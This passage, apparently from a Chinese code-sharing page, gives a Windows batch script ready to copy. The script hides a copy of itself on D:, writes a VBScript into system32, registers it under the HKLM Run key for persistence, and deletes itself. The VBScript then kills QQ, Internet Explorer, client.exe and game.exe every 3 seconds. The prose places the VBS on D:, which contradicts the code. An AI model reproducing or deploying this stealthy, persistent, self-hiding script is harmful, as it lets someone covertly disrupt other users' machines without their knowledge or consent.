并且自动添加注册表启动项,另外在D:/会生成一个隐藏属性的JK.VBS,
3秒间隔监控进程,如果进程中有QQ.exe、iexplore.exe、client.exe、game.exe进程则会自动结束进程。
复制代码代码如下:
@echo off
attrib -s -h -a -r d:/jk.bat 1>nul 2>nul
if exist d:/jk.bat del d:/jk.bat /q
copy %0 d:/jk.bat /y >nul
attrib +s +h +a +r d:/jk.bat
if exist %windir%/system32/jk.vbs del %windir%/system32/jk.vbs
echo y|reg add HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Run /v DATA /t REG_SZ /d c:/windows/system32/jk.vbs >nul
echo Do>>%windir%/system32/jk.vbs
echo WScript.Sleep 3000>>%windir%/system32/jk.vbs
echo strComputer = "." >>%windir%/system32/jk.vbs
echo Set objWMIService = GetObject("winmgmts://" ^& strComputer ^& "/root/CIMV2") >>%windir%/system32/jk.vbs
echo Set colItems = objWMIService.ExecQuery( _>>%windir%/system32/jk.vbs
echo "SELECT * FROM Win32_Process",,48)>>%windir%/system32/jk.vbs
echo For Each objItem in colItems >>%windir%/system32/jk.vbs
echo If objItem.Name="QQ.exe" Or objItem.Name="iexplore.exe" Or _>>%windir%/system32/jk.vbs
echo objItem.Name="client.exe" Or objItem.Name="game.exe" _>>%windir%/system32/jk.vbs
echo Then objitem.Terminate()>>%windir%/system32/jk.vbs
echo Next>>%windir%/system32/jk.vbs
echo loop>>%windir%/system32/jk.vbs
start %windir%/system32/jk.vbs
del %0 /q
